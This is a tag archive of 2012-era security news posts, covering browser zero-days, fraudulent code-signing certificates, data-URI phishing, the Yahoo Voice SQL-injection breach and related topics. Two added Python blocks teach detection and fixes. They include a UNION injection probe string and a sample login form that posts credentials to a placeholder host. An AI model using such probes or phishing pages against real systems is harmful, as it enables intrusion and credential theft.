Tag Archives: Online Security

Just a day after releasing Firefox 16, Mozilla pulled the update citing security concerns. Needless to say this was a pretty unusual move. Typically any security vulnerability present in a major release is fixed through point updates. Removing a new release was a drastic move, which indicated that Mozilla reckoned that the vulnerability had a significant chance of being exploited in the wild.

The vulnerability concerned could allow a malicious site to potentially determine which websites users have visited and have access to the URL or URL parameters. The security vulnerability was actually more of a privacy issue that could become a security issue on stupidly coded websites that use GET to transmit confidential information.

Mozilla released a fix for the Android version yesterday, and an updated desktop version was released moments ago. You can download Firefox 16.01 from here, or you can wait for your Firefox installation to automatically download the latest version.

The second installment of Google’s hacking fest Pwnium has just wrapped up, and once again Google Chrome’s security features were successfully bypassed. Earlier this year, Chrome fell for the first time when VUPEN managed to exploit it within five minutes at the first installment of Pwnium. During the same event, two more hackers, Pinkie Pie and Sergey Glazunov, managed to humble Chrome and bag the top award of $60,000.

The second edition of Pwnium was organized as a part of the ‘Hack in the Box 2012’ security conference held in Kuala Lumpur. This time around, Chrome’s sandboxing mechanism was defeated by exploiting two flaws – an “SVG use-after-free” and an “IPC arbitrary write”. The exploiter was once again Pinkie Pie. Since his exploit depended entirely on bugs within Chrome to achieve arbitrary code execution, it qualified for Google’s highest award level as a “full Chrome exploit”, and won him $60,000 and a free Chromebook.

A detailed explanation of the bugs leveraged by Pinkie Pie is not yet available. However, the good news is that Google has already patched the vulnerability, so even if you use Chrome, you are safe. Google deserves a round of applause not only for encouraging the security community to discover bugs in Chrome, but also for patching the vulnerability less than twelve hours after its disclosure.

If you are still using Internet Explorer 9 or below, here is one more reason to upgrade to Internet Explorer 10, or perhaps take a look at one of the many excellent free alternatives. A critical zero-day vulnerability has been uncovered in Internet Explorer that could allow a remote hacker to execute arbitrary code on your system even if you simply browse to an infected page. The vulnerability is already being actively exploited in the wild. Affected versions include Internet Explorer 6, 7, 8, and 9.

Eric Romang was the first to report the vulnerability, which has since been confirmed by Microsoft. The exploit has four main components: the Exploit.html file which acts as the starting point, the Moh2010.swf flash file that is responsible for spraying the heap with the payload that will be executed, the Protect.html file that is the actual trigger for the vulnerability, and additional malicious components that are downloaded and executed on the compromised system by the payload. The payload being dropped by the flash file has been identified to be the infamous Poison Ivy trojan.

If Internet Explorer 10 is not supported on your system and you don’t want to move to an alternate browser, Microsoft is recommending that you add Internet Explorer to the Enhanced Mitigation Experience Toolkit, or set Internet and Local intranet security zone settings to “High” to block ActiveX Controls and Active Scripting. Detailed workaround instructions are available in Microsoft’s Security Advisory.

Wikipedia defines a digital certificate as ‘an electronic document which uses a digital signature to bind a public key with an identity — information such as the name of a person or an organization, their address, and so forth. The certificate can be used to verify that a public key belongs to an individual.’

In the case of software, a certificate is used to ensure that the software is what it claims to be. Operating systems use digital certificates to make sure that an application being installed is valid. But what if the digital certificate was obtained by giving fake information?

There have been cases in the past where malware authors used stolen digital certificates for their rogue apps. But according to a report from Kaspersky, a group of Brazilian Trojan authors was able to obtain genuine certificates from Comodo by using fake data.

The authors used a fake company name, gastecnology.org, to obtain the certificate. As shown in the Securelist blog, a simple DNS lookup of that particular domain name gives us some clues as to the veracity of that company.

Firstly, the email address used to register the account was a free Yahoo Mail account, and secondly, the phone number and the address provided were fake.

After obtaining the digital certificate, the malware authors used an extensive email campaign to spread the malware. The certificate has been revoked since then and the application is now flagged as malware.

Although the certificate was revoked, the big question here is why the certificate was issued in the first place. Since a digital certificate plays an integral part in verifying the validity of an application, signing an application should only be done after verifying the submitted data, which was not the case here. Hopefully certification authorities will be more careful after this incident.

Nowadays everyone will be familiar with phishing attacks. Phishing is basically the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) while posing as someone else. The typical phishing attack involves creating a fake login page, storing it on a server and emailing the victim a link to the fake login page. Now a new research paper from InfoSec student Henning Klevjer shows how a hacker can create phishing attacks without the need to store the fake login page on a server.

This method uses a URI, or uniform resource identifier, which is basically a string of characters used to identify a name or a resource. Using a data URI, the required data (the code for the login page in this case) is stored within the URI itself, with the following scheme:

data:[<mediatype>][;base64],<data>

Here <data> will contain the fake login page. The procedure for creating a phishing URI starts with creating a login page using the code from the original page. The original code is modified so that the entered data, such as the password, is sent to a location of the hacker’s choosing. This page is then encoded using a scheme called Base64. Base64 is a method of encoding binary data in ASCII format, which increases the data size by around 33%. The next and final step is to append this encoded data to the URI.

The final URI will be an extremely long and suspicious-looking one. But as all browsers support legacy URI schemes, it will be rendered properly, as long as it doesn’t exceed the maximum URL length allowed by the browser.

Although the large URI can be masked using a URL shortening service, Henning states that this method has some major limitations thanks to the implementation of data URIs in Chrome and Internet Explorer.
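As an added illustration (not from Klevjer’s paper or the original post), the following Python parser decodes a data: URI of the scheme above and reports the indicators a mail or web filter would use to triage such a link: the media type, whether it renders as HTML, whether the decoded body carries a password form, and where that form posts. The sample page and its form action are constructed placeholders.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# The scheme described above: data:[<mediatype>][;base64],<data>
DATA_URI_RE = re.compile(r"^data:([^,]*?)(;base64)?,(.*)$", re.DOTALL | re.IGNORECASE)

# Markup a decoded credential-harvesting page needs: a form and a password field.
FORM_RE = re.compile(rb"<form[^>]*\baction\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
PASSWORD_RE = re.compile(rb"<input[^>]*\btype\s*=\s*[\"']?password", re.IGNORECASE)


def parse_data_uri(uri):
    """Return (mediatype, is_base64, decoded_bytes), or None if not a data: URI."""
    m = DATA_URI_RE.match(uri.strip())
    if not m:
        return None
    mediatype, b64_flag, payload = m.group(1), m.group(2), m.group(3)
    # RFC 2397 default when the media type is omitted.
    mediatype = mediatype or "text/plain;charset=US-ASCII"
    if b64_flag:
        # Tolerate stripped padding; anything else malformed decodes to nothing.
        padded = payload + "=" * (-len(payload) % 4)
        try:
            body = base64.b64decode(padded)
        except ValueError:
            body = b""
    else:
        body = unquote_to_bytes(payload)
    return mediatype, bool(b64_flag), body


def inspect_data_uri(uri):
    """Indicators for triaging a link: what it renders as and what it would collect."""
    parsed = parse_data_uri(uri)
    if parsed is None:
        return {"is_data_uri": False}
    mediatype, is_b64, body = parsed
    form = FORM_RE.search(body)
    return {
        "is_data_uri": True,
        "mediatype": mediatype.split(";")[0].lower(),
        "base64": is_b64,
        "uri_length": len(uri),
        "decoded_length": len(body),
        "renders_html": mediatype.lower().startswith("text/html"),
        "has_password_field": PASSWORD_RE.search(body) is not None,
        "form_action": form.group(1).decode("ascii", "replace") if form else None,
    }


def looks_like_credential_phish(uri):
    """True when the URI renders HTML containing a password form that posts somewhere."""
    r = inspect_data_uri(uri)
    return bool(r.get("renders_html") and r.get("has_password_field") and r.get("form_action"))


# Constructed sample: a harmless login-form skeleton, base64-encoded as the paper
# describes. The action host is a placeholder, not a real collector.
SAMPLE_PAGE = (b'<html><body><form action="https://collector.example/submit" method="post">'
               b'<input name="user"><input type="password" name="pass">'
               b'<input type="submit"></form></body></html>')
SAMPLE_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_PAGE).decode("ascii")

if __name__ == "__main__":
    print(inspect_data_uri(SAMPLE_URI))
    print(inspect_data_uri("data:,Hello%2C%20World"))
```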

Dropbox has been under fire more than once for its inability to protect users’ data. But now it looks like they are finally improving their security. Dropbox has now added an option to use two-step authentication for all of its users. Here’s how to enable it.

You will find a new option to enable two-step authentication at the bottom, as shown below. It will be disabled at the moment. Click Change.

You will have to enter your password to proceed. Then you will see a webpage overlay as shown below. Click Get Started.

You can choose to receive the authentication codes as text messages to your phone. Alternately, if you own a smartphone, you can use an authenticator app to generate authentication codes locally. Select the desired option and click ‘Next’.

Now, if you selected the option to receive the code via text message, enter your mobile number; if you chose to use the authenticator app, scan the provided QR code using any supported authenticator app.

When done, click ‘Finish’. You have now enabled two step verification for Dropbox.

You will have to download and install the Dropbox application for your OS again with the latest versions that support 2-factor authentication.

In the last two decades, we have seen a lot of changes around us. We have moved from standard definition to high definition content, from dial-up internet to high speed broadband communication, and our mode of interaction with devices is also changing, with touch and voice input becoming more common. We have also changed the way we communicate and store data. A lot of our data is stored online in the cloud and most of our communication is online through Twitter, Facebook etc.

Along with the aforementioned changes, our security policies are also changing. With us trusting more and more of our data with technology companies, it is vital for us to ruminate about their security procedures. In the early nineties, the security policies were framed based on the core principles known as CIA – confidentiality, integrity and availability. But times have changed and so have the bad guys. We can no longer rely on the old principles alone. Our security policies have to evolve and that too fast. But are we moving fast enough? Let’s take a look.

Just a few weeks ago, WIRED editor Mat Honan’s iCloud account was compromised along with his Amazon account. Using the hacked iCloud account, the hacker remotely wiped data from his iPhone, iPad and MacBook. How was the hacker able to do it? Shockingly, just by calling Apple customer support! The hacker was able to get all of the information required to take control of an account from the internet and Amazon using social engineering. You can read the entire story here.

This is just one example. You can find a number of incidents like this. Interestingly, most of today’s attacks use social engineering as the preferred method. But has the technology sector evolved enough to protect itself and its customers from these types of attacks? The truth is, while certain companies are trying their best, most or a lot of companies do not think outside the box. In a SANS white paper titled “A Multi-Level Defense Against Social Engineering”, David Gragg quotes Keith A. Rhodes, chief technologist at the U.S. General Accounting Office, as follows.

He notes, “Very few companies are worried about this. Every one of them should be.”

Considering that a large number of attacks in 2011 used social engineering, we can easily conclude that his words are very much true. Still, the unfortunate truth is that companies are not training their staff to detect social engineering tactics. For example, a large number of tech companies rely on personal information to reset passwords. In the current age of social networks, that information is fairly easy to obtain, as shown by the Mat Honan incident. By not taking our current technological ecosystem into consideration, these companies are effectively creating a loophole that hackers can make use of.

But every time a data breach occurs, can we blame the company or the client? Ted Claypoole, author of ‘Protecting Your Internet Identity: Are You Naked Online?’ says that at certain levels, preventing hacking is just impossible.

“Everyone is hacked. Sometimes a company has a big loss, and other times smaller losses. But professional criminals are testing weaknesses all the time, technology changes constantly, and all businesses have been a victim, or will be a victim. Some never know it.

There is no such thing as impenetrable security. For a thing to have value, you must be able to use it. And if you can reach it to use it, then so can a bad guy. Sometimes they impersonate the account holder. Sometimes they take jobs inside the company and become the security flaw. Sometimes they exploit the technology. But every company has “insufficient security policies” by your measure, because every company is vulnerable. Anyone who tells you that their major company has never been breached is either lying, naïve or both.

Last year a hacker, probably foreign government sponsored, broke into RSA, one of our very top security companies, and took information that could allow the hackers to hack defense contractors (like Lockheed Martin).

Our financial protection from harm lies not in company security policies, but in the system itself. This is why we have a $50 fraud limit on our credit cards, and why, when someone breaks in to steal up to $100,0000 of your money from the bank, they did not just steal your money – they either stole the bank’s money or the government’s money, and yours will be returned. The system eats billions in fraud each year and we all pay a little bit for it, so that the losses are not as unevenly distributed if it happens to you. So I question your assumption that companies who are hacked have insufficient security policies. Resources are limited. We can all spend only so much time and money on security. Sometimes you can have the top security in the world, and the bad guys are simply better.”

And that is certainly true. At times, the bad guys are just too good for us to prevent an incident. But that shouldn’t deter us from creating strong security policies and training our staff to prevent incidents such as the one that happened to Mat. The truth is that most of the time, the data breach would have been completely avoidable (96% of breaches in 2011 were avoidable according to Verizon Business Data Breach Investigations Report, 2011). For example, Microsoft India’s online store was hacked last year and password and credit card data was stolen. Apparently, the company that managed the store on behalf of Microsoft didn’t even bother to encrypt the passwords making the hacker’s job a walk in the park.

So what can we do to improve our current security infrastructure? What we need is a holistic approach to creating new security policies that takes into account the latest trends and methods of attack. The policies should evolve as fast as the attack vectors evolve. Now this is not an easy thing to do, but it has to be done in order to safeguard our data. We could have an internationally valid security certification process similar to ISO 27001 certification, which analyses the security policies and practices of a company and rates the company based on those policies. This will help customers in selecting the best in terms of security and will give the companies a necessary ‘push’ in framing the right policies.

Furthermore, the government can pass laws that prioritize the safeguard of consumer data. Unfortunately, there is no solid law in the US that focuses on protection of consumer data, says Ted. “Lawmakers in the United States are doing very little to force protection of user’s data. Other industrialized nations believe that data privacy and data security is a human right that their citizen’s hold. This country does not yet acknowledge any such right. We have laws protecting certain specific classes of information in certain circumstances – some health care data, financial data, and children’s information – but our data protection laws are confused and disjointed.”

While Senators are trying to pass laws such as SOPA for the benefit of the entertainment industry, it would be nice if they could spend a little bit of their valuable time making solid laws to protect our data as well as our identity online. Only effective security policies along with strong laws can bring about durable changes in the security infrastructure, so that we can sleep tight without worrying about our data.

I am a big fan of the Batman franchise movies and have watched them on the day they were released. To be honest, I can’t wait to watch the latest in the series, “Dark Knight Rises”, on July 20. Dark Knight Rises is definitely going to break box office records all over the world. However, even before the movie has been released, several torrent websites have been filled up with fake torrents for the Dark Knight Rises.

While you might get into trouble legally for downloading the content, there is a high chance that the torrents available on the internet are infected with viruses and spyware which might put your computer at risk.

Back in 2010, Harry Potter Deathly Hallows Part 1 was leaked on torrent websites and was downloaded millions of times. That leak was potentially intentional, because it left a good part of the movie out of the torrent, thus driving users back to the theatre to catch the rest of the movie. There were also several instances of fake torrents which infected users who downloaded them. The Dark Knight Rises torrents are fake and targeted towards gullible users, who will be infected with malware and spyware.

Reports are coming in that hackers have managed to hack into a Yahoo service and steal sensitive data of more than 453000 of its customers. According to TrustedSec, the security firm that first reported the incident, the service that was compromised was Yahoo Voice.

The affected website was only named as a subdomain of yahoo.com; however, digging through and searching for the hostname, the attacker forgot to remove the hostname “dbb1.ac.bf1.yahoo.com” (credit to Mubix for the hostname find). Looking through a variety of sources, it appears that the compromised server was likely “Yahoo! Voice”, which was formerly known as Associated Content (credit to Adam Caudill for the linkage).

The hackers have posted the database containing the email IDs and passwords as proof. According to the dump, the hackers used a method called union-based SQL injection to hack the database. It is a method where an attacker enters code into improperly protected input fields, and the application treats that input as part of its database commands.

The scariest part, according to TrustedSec, is that the passwords were stored as plain text without any kind of encryption. If this was indeed the case, it would have been a highly irresponsible action on Yahoo’s part.
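To make the two points above concrete (input treated as a database command, and passwords stored in plain text), here is an added Python example, not taken from TrustedSec’s report or from Yahoo’s code: an in-memory SQLite table with a string-concatenated lookup beside its parameterized replacement, and PBKDF2-hashed passwords in place of plaintext ones. The accounts and the probe string are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random salt; returns 'iterations$salt_hex$hash_hex'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute the hash from the stored parameters and compare in constant time."""
    iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def build_db():
    """Constructed sample accounts; the password column holds hashes, never plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice@example.com", hash_password("correct horse")),
                      ("bob@example.com", hash_password("battery staple"))])
    return conn


def lookup_vulnerable(conn, email):
    """The defect: the text-box value is pasted into the SQL string, so the
    database parses it as part of the command rather than as data."""
    sql = "SELECT email, password FROM users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, email):
    """The fix: the driver binds the value separately; it can only ever be data."""
    return conn.execute("SELECT email, password FROM users WHERE email = ?",
                        (email,)).fetchall()


def login(conn, email, password):
    """Login check built only on the parameterized lookup and the hash verifier."""
    rows = lookup_parameterized(conn, email)
    return bool(rows) and verify_password(password, rows[0][1])


# A probe in the shape the page describes: a UNION appended to the text-box input.
# Against the vulnerable lookup it returns every row; against the fixed one, none.
PROBE = "x' UNION SELECT email, password FROM users -- "

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", len(lookup_vulnerable(db, PROBE)), "rows")
    print("parameterized:", len(lookup_parameterized(db, PROBE)), "rows")
    print("login ok:", login(db, "alice@example.com", "correct horse"))
```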

The hackers posted the following statement along with the dump,

We hope that the parties responsible for managing the security of this subdomain will take this as a wake-up call, and not as a threat. There have been many security holes exploited in webservers belonging to Yahoo! Inc. that have caused far greater damage than our disclosure. Please do not take them lightly. The subdomain and vulnerable parameters have not been posted to avoid further damage.

If you are a Yahoo Voice customer, I recommend you change your password immediately and if you are using the same passwords for any other service (which is a bad practice), it is better to change that as well.

The second World Cyber Security Technology Research Summit met in Belfast recently and outlined a new research roadmap to tackle the problem of cyber crime on an international scale.

Belfast 2012 Report

The summit was sponsored by the Centre for Secure Information Technologies at Queen’s University, Belfast. It was attended by some heavy hitters in the security industry. According to the Queen’s University press release, it “included Chief Scientific Advisor from the UK Home Office – Professor Bernard Silverman, Cyber Security Division Director of US Homeland Security – Dr Douglas Maughan, Chairman and CEO of Kaspersky Labs – Eugene Kaspersky, Director of Innovation, Connected Energy Networks Cisco – Barbara Fraser, and Raj Samani, CTO, EMEA, McAfee.”

The conference produced four collaborative roadmap documents, each focused on a distinct area:

Adaptive Cyber Security Technologies – Systems need to have the ability to learn from cyber security events and learn on the fly. It was agreed that adaptive techniques could be risky, for instance if the system learns the wrong thing, but the consensus was that adaptive technologies were necessary and must be developed.

Protection of Smart Utility Grids – This addressed both physical and cyber security. One of the big focuses was on the standardization of smart meters and grid management systems.

Security of Mobile Platforms and Applications – The big challenge in this area is that mobility is too broad, and it was agreed that no single source could develop security for it. Protecting the consumer was a big topic of conversation.

Multifaceted Approach to Cyber Security Research – Some topics discussed here were sort of like a wish list. For instance, getting people to be as personally responsible for their own cyber security as they are physical security.

To be honest, as an IT Manager, the information flowing out of this summit is both fascinating and overwhelming. Some fantastic resources and presentations can be found on the “Belfast 2012” website at http://www.csit.qub.ac.uk/News/Events/Belfast2012/. Anyone interested in cyber security and getting a glance at what the big players in the biz are thinking should view this material.

CSIT Principal Investigator, Professor John McCanny, said, “Ultimately our objective is to help make the Internet of tomorrow a safe and secure platform which is vital for global economic growth and societal development.” I say that is a tall order, but due to the many rogues lurking in every corner of our world, it’s an objective that has to be met. When it’s all said and done, I wouldn’t put my money on freedom as being their top priority.